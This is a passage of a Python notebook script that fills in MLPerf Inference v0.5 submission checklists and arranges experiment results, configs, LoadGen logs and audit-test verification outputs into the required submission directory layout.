99%%-tile is required for all other models. ### Single Stream Results Table | SUT Name | Benchmark | Query Count | Accuracy | |----------|-----------|-------------|----------| | %(system)s | %(benchmark)s | %(query_count)s | %(accuracy_pc)s%% | ### Multi-Stream Results Table | SUT Name | Benchmark | Query Count | Accuracy | 97%%-tile Latency | 99%%-tile Latency | |----------|-----------|-------------|-----------|------------------|------------------| | | | | | | | ### Server Results Table | SUT Name | Benchmark | Query Count | Accuracy | 97%%-tile Latency | 99%%-tile Latency | |----------|-----------|-------------|----------|------------------|------------------| | | | | | | | ### Offline Results Table | SUT Name | Benchmark | Sample Count | Accuracy | |----------|-----------|--------------|----------| | | | | | Scenario (check all that apply): - [%(scenario_singlestream)s] Single-Stream - [%(scenario_multistream)s] Multi-Stream - [%(scenario_server)s] Server - [%(scenario_offline)s] Offline For each SUT, does the submission meet the latency target for each combination of benchmark and scenario? (check all that apply) - [x] Yes (Single-Stream and Offline no requirements) - [ ] Yes (MobileNet x Multi-Stream 50 ms @ 99%%) - [ ] Yes (MobileNet x Server 10 ms @ 99%%) - [ ] Yes (SSD-MobileNet x Multi-Stream 50 ms @ 99%%) - [ ] Yes (SSD-MobileNet x Server 10 ms @ 99%%) - [ ] Yes (ResNet x Multi-Stream 50 ms @ 99%%) - [ ] Yes (ResNet x Server 15 ms @ 99%%) - [ ] Yes (SSD-1200 x Multi-Stream 66 ms @ 99%%). - [ ] Yes (SSD-1200 x Server 100 ms @ 99%%) - [ ] Yes (NMT x Multi-Stream 100 ms @ 97%%) - [ ] Yes (NMT x Server 250 ms @ 97%%) - [ ] No For each SUT, is the appropriate minimum number of queries or samples met, depending on the Scenario x Benchmark? (check all that apply) - [x] Yes (Single-Stream 1,024 queries) - [ ] Yes (Offline 24,576 samples) - [ ] Yes (NMT Server and Multi-Stream 90,112 queries) - [ ] Yes (Image Models Server and Multi-Stream 270,336 queries) - [ ] No For each SUT and scenario, is the benchmark accuracy target met? (check all that apply) - [%(mobilenet_accuracy_met)s] Yes (MobileNet 71.68%% x 98%%) - [ ] Yes (SSD-MobileNet 0.22 mAP x 99%%) - [%(resnet_accuracy_met)s] Yes (ResNet 76.46%% x 99%%) - [ ] Yes (SSD-1200 0.20 mAP x 99%%) - [ ] Yes (NMT 23.9 BLEU x 99%%) - [%(accuracy_not_met)s] No For each SUT and scenario, did the submission run on the whole validation set in accuracy mode? (check one) - [x] Yes - [ ] No How many samples are loaded into the QSL in performance mode? %(performance_sample_count)s For each SUT and scenario, does the number of loaded samples in the QSL in performance mode meet the minimum requirement? (check all that apply) - [%(performance_sample_count_1024)s] Yes (ResNet and MobileNet 1,024 samples) - [%(performance_sample_count_256)s] Yes (SSD-MobileNet 256 samples) - [%(performance_sample_count_64)s] Yes (SSD-1200 64 samples) - [ ] Yes (NMT 3,903,900 samples) - [%(performance_sample_count_not_met)s] No For each SUT and scenario, is the experimental duration greater than or equal to 60 seconds? (check one) - [x] Yes - [ ] No Does the submission use LoadGen? (check one) - [x] Yes - [ ] No Is your loadgen commit from one of these allowed commit hashes? - [%(revision_61220457de)s] 61220457dec221ed1984c62bd9d382698bd71bc6 - [%(revision_5684c11e39)s] 5684c11e3987b614aae830390fa0e92f56b7e800 - [%(revision_55c0ea4e77)s] 55c0ea4e772634107f3e67a6d0da61e6a2ca390d - [%(revision_d31c18fbd9)s] d31c18fbd9854a4f1c489ca1bc4cd818e48f2bc5 - [%(revision_1d0e06e54a)s] 1d0e06e54a7d763cf228bdfd8b1e987976e4222f - [%(revision_other)s] Other, please specify: %(revision_other_specify)s Do you have any additional change to LoadGen? (check one) - [ ] Yes, please specify: - [x] No Does the submission run the same code in accuracy and performance modes? (check one) - [x] Yes - [ ] No Where is the LoadGen trace stored? (check one) - [x] Host DRAM - [ ] Other, please specify: For the submitted result, what is the QSL random number generator seed? - [x] 0x2b7e151628aed2a6ULL (3133965575612453542) - [ ] Other, please specify: For the submitted results, what is the sample index random number generator seed? - [x] 0x093c467e37db0c7aULL (665484352860916858) - [ ] Other, please specify: For the submitted results, what is the schedule random number generator seed? - [x] 0x3243f6a8885a308dULL (3622009729038561421) - [ ] Other, please specify: For each SUT and scenario, is the submission run the correct number of times for the relevant scenario? (check one) - [x] Yes (Accuracy 1x Performance 1x Single-Stream, Multi-Stream, Offline) - [ ] Yes (Accuracy 1x Performance 5x Server) - [ ] No Are the weights calibrated using data outside of the calibration set? (check one) - [ ] Yes - [x] No What untimed pre-processing does the submission use? (check all that apply) - [x] Resize - [ ] Reorder channels or transpose - [ ] Pad - [x] A single crop - [x] Mean subtraction and normalization - [ ] Convert to whitelisted format - [ ] No pre-processing - [ ] Other, please specify: What numerics does the submission use? (check all that apply) - [ ] INT4 - [ ] INT8 - [ ] INT16 - [%(numerics_uint8)s] UINT8 - [ ] UINT16 - [ ] FP11 - [ ] FP16 - [ ] BF16 - [%(numerics_fp32)s] FP32 - [ ] Other, please specify: Which of the following techniques does the submission use? (check all that apply) - [ ] Wholesale weight replacement - [ ] Weight supplements - [ ] Discarding non-zero weight elements - [ ] Pruning - [ ] Caching queries - [ ] Caching responses - [ ] Caching intermediate computations - [ ] Modifying weights during the timed portion of an inference run - [ ] Weight quantization algorithms that are similar in size to the non-zero weights they produce - [ ] Hard coding the total number of queries - [ ] Techniques that boost performance for fixed length experiments but are inapplicable to long-running services except in the offline scenario - [ ] Using knowledge of the LoadGen implementation to predict upcoming lulls or spikes in the server scenario - [ ] Treating beams in a beam search differently. For example, employing different precision for different beams - [ ] Changing the number of beams per beam search relative to the reference - [ ] Incorporating explicit statistical information about the performance or accuracy sets - [ ] Techniques that take advantage of upsampled images. - [ ] Techniques that only improve performance when there are identical samples in a query. - [x] None of the above Is the submission congruent with all relevant MLPerf rules? - [x] Yes - [ ] No For each SUT, does the submission accurately reflect the real-world performance of the SUT? - [x] Yes - [ ] No""" def get_checklist(checklist_template=checklist_template, name='Anton Lokhmotov', email='anton@dividiti.com', system='rpi4-tflite-v1.15', system_name='Raspberry Pi 4 (rpi4)', revision='61220457de', division='closed', category='available', task='image-classification', benchmark='mobilenet', scenario='singlestream', performance_sample_count=1024, performance_sample_count_met=True, accuracy_pc=12.345, accuracy_met=True, numerics='fp32'): def tick(var): return "x" if var else " " print("=" * 100) print(system) print("=" * 100) revision_other = revision not in [ '61220457de', '5684c11e39', '55c0ea4e77', 'd31c18fbd9', '1d0e06e54a' ] benchmark_other = benchmark not in [ 'mobilenet', 'resnet'] if benchmark=='mobilenet': accuracy_met = accuracy_pc >= 71.676*0.98 elif benchmark=='resnet': accuracy_met = accuracy_pc >= 76.456*0.99 else: accuracy_met = accuracy_met and accuracy_pc > 0 checklist = checklist_template % { "name" : name, "email" : email, "system_name": system_name, # Division. "closed" : tick(division=='closed'), "open" : tick(division=='open'), # Division. "category_available" : tick(category.lower()=='available'), "category_preview" : tick(category.lower()=='preview'), "category_rdi" : tick(category.lower()=='rdi'), # Benchmark. "benchmark_mobilenet": tick(benchmark=='mobilenet'), "benchmark_resnet": tick(benchmark=='resnet'), "benchmark_other": tick(benchmark_other), "benchmark_other_specify": benchmark if benchmark_other else '', # Table. "system" : system, "benchmark" : benchmark, "query_count": 50000 if task=='image-classification' else 5000, "accuracy_pc" : "%.3f" % accuracy_pc, # Scenario. "scenario_singlestream": tick(scenario=='singlestream'), "scenario_multistream": tick(scenario=='multistream'), "scenario_server": tick(scenario=='server'), "scenario_offline": tick(scenario=='offline'), # Accuracy. "mobilenet_accuracy_met" : tick(benchmark=='mobilenet' and accuracy_met), "resnet_accuracy_met" : tick(benchmark=='resnet' and accuracy_met), "accuracy_not_met" : tick(not accuracy_met), # "How many samples are loaded into the QSL in performance mode?" "performance_sample_count": performance_sample_count, "performance_sample_count_1024": tick(performance_sample_count==1024), "performance_sample_count_256": tick(performance_sample_count==256), "performance_sample_count_64": tick(performance_sample_count==64), "performance_sample_count_not_met": tick(not performance_sample_count_met), # TODO # LoadGen revision. "revision_61220457de": tick(revision=='61220457de'), "revision_5684c11e39": tick(revision=='5684c11e39'), "revision_55c0ea4e77": tick(revision=='55c0ea4e77'), "revision_d31c18fbd9": tick(revision=='d31c18fbd9'), "revision_1d0e06e54a": tick(revision=='1d0e06e54a'), "revision_other": tick(revision_other), "revision_other_specify": revision if revision_other else '', # Numerics. "numerics_uint8": tick(numerics=='uint8'), "numerics_fp32": tick(numerics=='fp32'), } print(checklist) print("-" * 100) return checklist # null = get_checklist(system='rpi4-armnn-v19.08-neon', system_name='Raspberry Pi 4 (rpi4)', benchmark='mobilenet', accuracy_pc=70.241, numerics='uint8') # null = get_checklist(system='hikey960-tflite-v1.15', system_name='Linaro HiKey 960 (hikey960)', benchmark='resnet', accuracy_pc=75.692, revision='deadbeef') null = get_checklist(system='velociti-tensorflow-v1.14-cpu', name='Anton Lokhmotov; Emanuele Vitali', email='anton@dividiti.com; emanuele.vitali@polimi.it', system_name='HP Z640 G1X62EA workstation (velociti)', division='open', category='RDI', benchmark='ssd-mobilenet-fpn') # <a id="check"></a> # ## Check the experimental data # In[ ]: # # Image Classification - Closed (MobileNet, ResNet). # repos_image_classification_closed = [ # firefly 'mlperf.closed.image-classification.firefly.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/18 'mlperf.closed.image-classification.firefly.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/21 'mlperf.closed.image-classification.firefly.armnn-v19.08.opencl', #https://github.com/mlperf/submissions_inference_0_5/pull/22 # hikey960 'mlperf.closed.image-classification.hikey960.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/23 'mlperf.closed.image-classification.hikey960.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/24 'mlperf.closed.image-classification.hikey960.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/25 # rpi4 'mlperf.closed.image-classification.rpi4.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/26/ 'mlperf.closed.image-classification.rpi4.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/30 # mate10pro 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/32 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/35 ] repos_image_classification_closed_audit = [ 'mlperf.closed.image-classification.firefly.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/234 'mlperf.closed.image-classification.hikey960.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/236 'mlperf.closed.image-classification.rpi4.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/238 #'mlperf.closed.image-classification.mate10pro.audit', ] # # Image Classification - Open (MobileNets-v1,v2). # repos_image_classification_open = [ # firefly 'mlperf.open.image-classification.firefly.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/39 'mlperf.open.image-classification.firefly.tflite-v1.15.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/127 'mlperf.open.image-classification.firefly.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/40 'mlperf.open.image-classification.firefly.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/120 # hikey960 'mlperf.open.image-classification.hikey960.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/37 'mlperf.open.image-classification.hikey960.tflite-v1.15.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/128 'mlperf.open.image-classification.hikey960.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/38 'mlperf.open.image-classification.hikey960.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/121 # rpi4 'mlperf.open.image-classification.rpi4.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/122 'mlperf.open.image-classification.rpi4.tflite-v1.15.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/129 'mlperf.open.image-classification.rpi4.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/123 # mate10pro 'mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet', # https://github.com/mlperf/submissions_inference_0_5/pull/130 'mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/135 ] repos_image_classification_open_audit = [ 'mlperf.open.image-classification.firefly.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/255 'mlperf.open.image-classification.hikey960.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/257 'mlperf.open.image-classification.rpi4.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/258 #'mlperf.open.image-classification.mate10pro.audit', ] # # Object Detection - Open (TensorFlow Model Zoo + YOLO-v3) # repos_object_detection_open = [ # velociti 'mlperf.open.object-detection.velociti', # https://www.dropbox.com/s/wiea3a8zf077jsv/mlperf.open.object-detection.velociti.zip ] # In[ ]: # repos_for_testing = [ # 'mlperf.closed.image-classification.mate10pro.tflite-v1.13.mobilenet.BAD_LOADGEN', # 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.BAD_RESNET', # 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.BAD_RESNET', # 'mlperf-inference-vision-experiments-count5' # ] # In[ ]: # #!ck recache repo # for repo_uoa in repos: # print("=" * 100) # print(repo_uoa) # print("=" * 100) # !ck list $repo_uoa:experiment:* | sort # print("-" * 100) # print("") # In[ ]: upstream_path=os.environ.get('CK_ENV_MLPERF_INFERENCE','') # In[ ]: root_dir=os.environ.get('CK_MLPERF_SUBMISSION_ROOT','') def check_experimental_results(repo_uoa, module_uoa='experiment', tags='mlperf', submitter='dividiti', path=None, audit=False): if not os.path.exists(root_dir): os.mkdir(root_dir) print("Storing results under '%s'" % root_dir) r = ck.access({'action':'search', 'repo_uoa':repo_uoa, 'module_uoa':module_uoa, 'tags':tags}) if r['return']>0: print('Error: %s' % r['error']) exit(1) experiments = r['lst'] for experiment in experiments: data_uoa = experiment['data_uoa'] r = ck.access({'action':'list_points', 'repo_uoa':repo_uoa, 'module_uoa':module_uoa, 'data_uoa':data_uoa}) if r['return']>0: print('Error: %s' % r['error']) exit(1) print("*" * 100) tags = r['dict']['tags'] #print(tags) backend = '' preprocessing = '' notes = '' # pprint(tags) if 'velociti' in tags: # Expected format: [ "mlperf", "open", "object-detection", "velociti", "cpu", "rcnn-inception-resnet-v2-lowproposals", "singlestream", "accuracy" ] (_, division, task, platform, backend, benchmark, scenario, mode) = tags if task == 'object-detection': library = 'tensorflow-v1.14' else: library = 'tensorrt-v6.0' backend = '' notes = '======= DEMO =======' elif 'accuracy' in tags: # FIXME: With the benefit of hindsight, [ ..., "armnn-v19.08", "neon", ... ] should have come # as one tag "armnn-v19.08-neon", since we join them in this notebook anyway. if 'neon' in tags or 'opencl' in tags: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "armnn-v19.08", "neon", "mobilenet-v1-0.5-128", "singlestream", "accuracy", "using-opencv" ] (_, division, task, platform, library, backend, benchmark, scenario, mode, preprocessing) = tags else: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "tflite-v1.15", "mobilenet-v1-0.5-128", "singlestream", "accuracy", "using-opencv" ] (_, division, task, platform, library, benchmark, scenario, mode, preprocessing) = tags elif 'performance' in tags: if 'neon' in tags or 'opencl' in tags: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "armnn-v19.08", "neon", "mobilenet-v1-0.5-128", "singlestream", "performance" ] (_, division, task, platform, library, backend, benchmark, scenario, mode) = tags else: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "tflite-v1.15", "mobilenet-v1-0.5-128", "singlestream", "performance" ] (_, division, task, platform, library, benchmark, scenario, mode) = tags elif 'audit' in tags: # As accuracy but with the test name instead of the preprocessing method. if 'neon' in tags or 'opencl' in tags: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "armnn-v19.08", "neon", "mobilenet-v1-0.5-128", "singlestream", "audit", "TEST03" ] (_, division, task, platform, library, backend, benchmark, scenario, mode, test) = tags else: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "tflite-v1.15", "mobilenet-v1-0.5-128", "singlestream", "audit", "TEST03" ] (_, division, task, platform, library, benchmark, scenario, mode, test) = tags else: raise "Expected 'accuracy' or 'performance' or 'audit' in tags!" # if mode == 'accuracy': continue organization = submitter if backend != '': system = platform+'-'+library+'-'+backend else: system = platform+'-'+library division_system = division+'-'+system if library.startswith('tflite'): implementation = task+'-tflite' elif library.startswith('armnn'): implementation = task+'-armnn-tflite' elif library.startswith('tensorrt'): implementation = task+'-tensorrt-loadgen-py' else: # Official app with CK adaptations. implementation = 'mlperf-inference-vision' implementation_benchmark = implementation+'-'+benchmark # # Directory structure according to the Inference section of the General MLPerf Submission Rules: # https://github.com/mlperf/policies/blob/master/submission_rules.adoc#552-inference # # <division>/ # <organization>/ # division_dir = os.path.join(root_dir, division) if not os.path.exists(division_dir): os.mkdir(division_dir) organization_dir = os.path.join(division_dir, organization) if not os.path.exists(organization_dir): os.mkdir(organization_dir) # # "systems"/ # <system_desc_id>.json # systems_dir = os.path.join(organization_dir, 'systems') if not os.path.exists(systems_dir): os.mkdir(systems_dir) system_json_name = '%s.json' % system system_json_path = os.path.join(systems_dir, system_json_name) with open(system_json_path, 'w') as system_json_file: # pprint(division_system) # pprint(division_systems) system_json = division_systems.get(division_system, default_system_json) json.dump(system_json, system_json_file, indent=2) print('%s' % systems_dir) if system_json == default_system_json: print(' |_ %s [DEFAULT]' % system_json_name) raise else: print(' |_ %s [%s]' % (system_json_name, division_system)) # # "code"/ # <benchmark_name_per_reference>/ # <implementation_id>/ # <Code interface with loadgen and other arbitrary stuff> # code_dir = os.path.join(organization_dir, 'code') if not os.path.exists(code_dir): os.mkdir(code_dir) # FIXME: For now, not always "per reference". benchmark_dir = os.path.join(code_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) implementation_dir = os.path.join(benchmark_dir, implementation) if not os.path.exists(implementation_dir): os.mkdir(implementation_dir) print('%s' % code_dir) # Create 'README.md'. implementation_readme_name = 'README.md' implementation_readme_path = os.path.join(implementation_dir, implementation_readme_name) # pprint(implementation) # pprint(implementation_readmes) implementation_readme = implementation_readmes.get(implementation, '') with open(implementation_readme_path, 'w') as implementation_readme_file: implementation_readme_file.writelines(implementation_readme) if implementation_readme == '': print(' |_ %s [EMPTY]' % implementation_readme_name) raise else: print(' |_ %s' % implementation_readme_name) # # "measurements"/ # <system_desc_id>/ # <benchmark>/ # <scenario>/ # <system_desc_id>_<implementation_id>.json # README.md # user.conf # mlperf.conf # calibration_process.adoc (?) # submission_checklist.txt # measurements_dir = os.path.join(organization_dir, 'measurements') if not os.path.exists(measurements_dir): os.mkdir(measurements_dir) system_dir = os.path.join(measurements_dir, system) if not os.path.exists(system_dir): os.mkdir(system_dir) benchmark_dir = os.path.join(system_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) scenario_dir = os.path.join(benchmark_dir, scenario) if not os.path.exists(scenario_dir): os.mkdir(scenario_dir) print(scenario_dir) # Create '<system_desc_id>_<implementation_id>.json'. system_implementation_json_name = system+'_'+implementation+'.json' system_implementation_json_path = os.path.join(scenario_dir, system_implementation_json_name) with open(system_implementation_json_path, 'w') as system_implementation_json_file: implementation_benchmark_json = implementation_benchmarks.get(implementation_benchmark, default_implementation_benchmark_json) # pprint(implementation_benchmark) if implementation_benchmark_json != default_implementation_benchmark_json: print(' |_ %s [for %s]' % (system_implementation_json_name, implementation_benchmark)) json.dump(implementation_benchmark_json, system_implementation_json_file, indent=2) else: print(' |_ %s [DEFAULT]' % system_implementation_json_name) raise "Default implementation!" # Create 'README.md' based on the division and task (basically, mentions a division- and task-specific script). measurements_readme_name = 'README.md' measurements_readme_path = os.path.join(scenario_dir, measurements_readme_name) measurements_readme = measurements_readmes.get(division+'-'+task, '') if measurements_readme != '': with open(measurements_readme_path, 'w') as measurements_readme_file: measurements_readme_file.writelines(measurements_readme) print(' |_ %s [for %s %s]' % (measurements_readme_name, division, task)) else: raise "Invalid measurements README!" # Create 'NOTES.txt'. measurements_notes_name = 'NOTES.txt' measurements_notes_path = os.path.join(scenario_dir, measurements_notes_name) measurements_notes = notes if measurements_notes != '': with open(measurements_notes_path, 'w') as measurements_notes_file: measurements_notes_file.writelines(measurements_notes) print(' |_ %s [for %s %s]' % (measurements_notes_name, division, task)) # Try to find environment for 'user.conf'. loadgen_config_tags='loadgen,config,'+implementation lgc = ck.access({'action':'search', 'module_uoa':'env', 'tags':loadgen_config_tags}) if lgc['return']>0: print('Error: %s' % lgc['error']) exit(1) envs = lgc['lst'] if len(envs) > 1: # Found several environments. print('Error: More than one environment found with tags=\'%s\'' % loadgen_config_tags) exit(1) elif len(envs) == 1: # Found exactly one environment. lgc = ck.access({'action':'load', 'module_uoa':'env', 'data_uoa':envs[0]['data_uoa']}) if lgc['return']>0: print('Error: %s' % lgc['error']) exit(1) # CK_ENV_LOADGEN_CONFIG=/home/anton/CK_REPOS/ck-mlperf/soft/config.loadgen/image-classification-armnn-tflite-loadgen-conf # CK_ENV_LOADGEN_CONFIG_FILE=/home/anton/CK_REPOS/ck-mlperf/soft/config.loadgen/image-classification-armnn-tflite-loadgen-conf/user.conf user_conf_path=lgc['dict']['env']['CK_ENV_LOADGEN_CONFIG_FILE'] user_conf_name=user_conf_path[len(lgc['dict']['env']['CK_ENV_LOADGEN_CONFIG'])+1:] elif len(envs) == 0: # Not found any environments: copy 'user.conf' from implementation source. user_conf_name = 'user.conf' implementation_path = implementation_paths.get(implementation, '') if implementation_path == '': raise "Invalid implementation path!" user_conf_path = os.path.join(implementation_path, user_conf_name) copy2(user_conf_path, scenario_dir) print(' |_ %s [from %s]' % (user_conf_name, user_conf_path)) # Copy 'mlperf.conf' from MLPerf Inference source. mlperf_conf_name = 'mlperf.conf' mlperf_conf_path = os.path.join(scenario_dir, mlperf_conf_name) if implementation in [ 'image-classification-tflite', 'image-classification-armnn-tflite' ]: # Write a snapshot from https://github.com/dividiti/inference/blob/61220457dec221ed1984c62bd9d382698bd71bc6/v0.5/mlperf.conf with open(mlperf_conf_path, 'w') as mlperf_conf_file: mlperf_conf_file.writelines(mlperf_conf_6122045) print(' |_ %s [from %s]' % (mlperf_conf_name, 'github.com/mlperf/inference@6122045')) else: upstream_mlperf_conf_path = os.path.join(upstream_path, 'v0.5', 'mlperf.conf') copy2(upstream_mlperf_conf_path, mlperf_conf_path) print(' |_ %s [from %s]' % (mlperf_conf_name, upstream_mlperf_conf_path)) # Write submission_checklist.txt into the same directory later, once accuracy.txt is parsed. # # "results"/ # <system_desc_id>/ # <benchmark>/ # <scenario>/ # performance/ # run_x/ # 1 run for single stream and offline, 5 otherwise # mlperf_log_summary.txt # mlperf_log_detail.txt # mlperf_log_trace.json # accuracy/ # mlperf_log_accuracy.json # compliance_checker_log.txt # results_dir = os.path.join(organization_dir, 'results') if not os.path.exists(results_dir): os.mkdir(results_dir) system_dir = os.path.join(results_dir, system) if not os.path.exists(system_dir): os.mkdir(system_dir) benchmark_dir = os.path.join(system_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) scenario_dir = os.path.join(benchmark_dir, scenario) if not os.path.exists(scenario_dir): os.mkdir(scenario_dir) mode_dir = os.path.join(scenario_dir, mode) if not os.path.exists(mode_dir): os.mkdir(mode_dir) print(mode_dir) if audit: # Deal with a subset of audit tests. # if test not in [ 'TEST03' ]: # [ 'TEST01', 'TEST03', 'TEST04-A', 'TEST04-B', 'TEST05' ]: # continue # Save the accuracy and performance dirs for the corresponding submission experiment. accuracy_dir = os.path.join(scenario_dir, 'accuracy') performance_dir = os.path.join(scenario_dir, 'performance', 'run_1') # Use the mode expected for each test. mode = 'performance' if test != 'TEST03' else 'submission' # Create a similar directory structure to results_dir, with another level, test_dir, # between scenario_dir and mode_dir. audit_dir = os.path.join(organization_dir, 'audit') if not os.path.exists(audit_dir): os.mkdir(audit_dir) system_dir = os.path.join(audit_dir, system) if not os.path.exists(system_dir): os.mkdir(system_dir) benchmark_dir = os.path.join(system_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) scenario_dir = os.path.join(benchmark_dir, scenario) if not os.path.exists(scenario_dir): os.mkdir(scenario_dir) test_dir = os.path.join(scenario_dir, test) if not os.path.exists(test_dir): os.mkdir(test_dir) mode_dir = os.path.join(test_dir, mode) if not os.path.exists(mode_dir): os.mkdir(mode_dir) # For each point (should be one point for each performance run). points = r['points'] for (point, point_idx) in zip(points, range(1,len(points)+1)): point_file_path = os.path.join(r['path'], 'ckp-%s.0001.json' % point) with open(point_file_path) as point_file: point_data_raw = json.load(point_file) characteristics_list = point_data_raw['characteristics_list'] characteristics = characteristics_list[0] # Set the leaf directory. if mode == 'performance': run_dir = os.path.join(mode_dir, 'run_%d' % point_idx) if not os.path.exists(run_dir): os.mkdir(run_dir) last_dir = run_dir # Performance notes. Should ideally go inside the run_x dir, but the checker complains. if 'velociti' in tags and 'tensorrt' in tags: num_streams = point_data_raw['choices']['env'].get('CK_LOADGEN_MULTISTREAMNESS', '') if num_streams == '': num_streams = '?' performance_notes = 'uid={}: {} streams'.format(point, num_streams) performance_notes_name = run_dir + '.txt' performance_notes_path = os.path.join(mode_dir, performance_notes_name) with open(performance_notes_path, 'w') as performance_notes_file: performance_notes_file.writelines(performance_notes) print(' |_ %s' % performance_notes_name) else: last_dir = mode_dir print(last_dir) # Dump files in the leaf directory. mlperf_log = characteristics['run'].get('mlperf_log',{}) # Summary file (with errors and warnings in accuracy mode, with statistics in performance mode). summary_txt_name = 'mlperf_log_summary.txt' summary_txt_path = os.path.join(last_dir, summary_txt_name) summary = mlperf_log.get('summary','') with open(summary_txt_path, 'w') as summary_txt_file: summary_txt_file.writelines(summary) print(' |_ %s' % summary_txt_name) # Detail file (with settings). detail_txt_name = 'mlperf_log_detail.txt' detail_txt_path = os.path.join(last_dir, detail_txt_name) detail = mlperf_log.get('detail','') with open(detail_txt_path, 'w') as detail_txt_file: detail_txt_file.writelines(detail) print(' |_ %s' % detail_txt_name) # Accuracy file (with accuracy dictionary). # TODO: Move the next 5 lines into the (if mode == 'accuracy') block, # once the submission checker no longer complains as follows: # "performance/run_1 has file list mismatch (['mlperf_log_accuracy.json'])" accuracy_json_name = 'mlperf_log_accuracy.json' accuracy_json_path = os.path.join(last_dir, accuracy_json_name) with open(accuracy_json_path, 'w') as accuracy_json_file: json.dump(mlperf_log.get('accuracy',{}), accuracy_json_file, indent=2) print(' |_ %s' % accuracy_json_name) # Do what's required by NVIDIA's audit tests. if audit: test_path = os.path.join(upstream_path, 'v0.5', 'audit', 'nvidia', test) if 'TEST01' in tags: # Verify that the accuracy (partially) dumped for the audit test matches that for the submision. verify_accuracy_py = os.path.join(test_path, 'verify_accuracy.py') submission_accuracy_json_path = os.path.join(accuracy_dir, accuracy_json_name) verify_accuracy_txt = get_ipython().getoutput('python3 $verify_accuracy_py -a $submission_accuracy_json_path -p $accuracy_json_path') verify_accuracy_txt_name = 'verify_accuracy.txt' verify_accuracy_txt_path = os.path.join(test_dir, verify_accuracy_txt_name) with open(verify_accuracy_txt_path, 'w') as verify_accuracy_txt_file: verify_accuracy_txt_file.writelines('\n'.join(verify_accuracy_txt)) print('%s' % test_dir) print(' |_ %s' % verify_accuracy_txt_name) if test in [ 'TEST01', 'TEST03', 'TEST05' ]: # Verify that the performance for the audit test matches that for the submission. verify_performance_py = os.path.join(test_path, 'verify_performance.py') submission_summary_txt_path = os.path.join(performance_dir, summary_txt_name) verify_performance_txt = get_ipython().getoutput('python3 $verify_performance_py -r $submission_summary_txt_path -t $summary_txt_path') verify_performance_txt_name = 'verify_performance.txt' verify_performance_txt_path = os.path.join(test_dir, verify_performance_txt_name) with open(verify_performance_txt_path, 'w') as verify_performance_txt_file: verify_performance_txt_file.writelines('\n'.join(verify_performance_txt)) print('%s' % test_dir) print(' |_ %s' % verify_performance_txt_name) if test in [ 'TEST04-A', 'TEST04-B' ]: test04a_summary_txt_path = os.path.join(scenario_dir, 'TEST04-A', 'performance', 'run_1', summary_txt_name) test04b_summary_txt_path = os.path.join(scenario_dir, 'TEST04-B', 'performance', 'run_1', summary_txt_name) if os.path.exists(test04a_summary_txt_path) and os.path.exists(test04b_summary_txt_path): # If both tests have been processed, verify that their performance matches. verify_performance_py = os.path.join(upstream_path, 'v0.5', 'audit', 'nvidia', 'TEST04-A', 'verify_test4_performance.py') #print("python3 {} -u {} -s {}".format(verify_performance_py, test04a_summary_txt_path, test04b_summary_txt_path)) verify_performance_txt = get_ipython().getoutput('python3 $verify_performance_py -u $test04a_summary_txt_path -s $test04b_summary_txt_path') #print(verify_performance_txt) verify_performance_txt_name = 'verify_performance.txt' verify_performance_txt_path = os.path.join(scenario_dir, 'TEST04-A', verify_performance_txt_name) with open(verify_performance_txt_path, 'w') as verify_performance_txt_file: verify_performance_txt_file.writelines('\n'.join(verify_performance_txt)) print('%s' % os.path.join(scenario_dir, 'TEST04-A')) print(' |_ %s' % verify_performance_txt_name) else: # Need both A/B tests to be processed. Wait for the other one. continue # Generate accuracy.txt. if mode == 'accuracy' or mode == 'submission': accuracy_txt_name = 'accuracy.txt' accuracy_txt_path = os.path.join(last_dir, accuracy_txt_name) if task == 'image-classification': accuracy_imagenet_py = os.path.join(upstream_path, 'v0.5', 'classification_and_detection', 'tools', 'accuracy-imagenet.py') accuracy_txt = get_ipython().getoutput('python3 $accuracy_imagenet_py --imagenet-val-file $imagenet_val_file --mlperf-accuracy-file $accuracy_json_path') # The last (and only line) is e.g. "accuracy=76.442%, 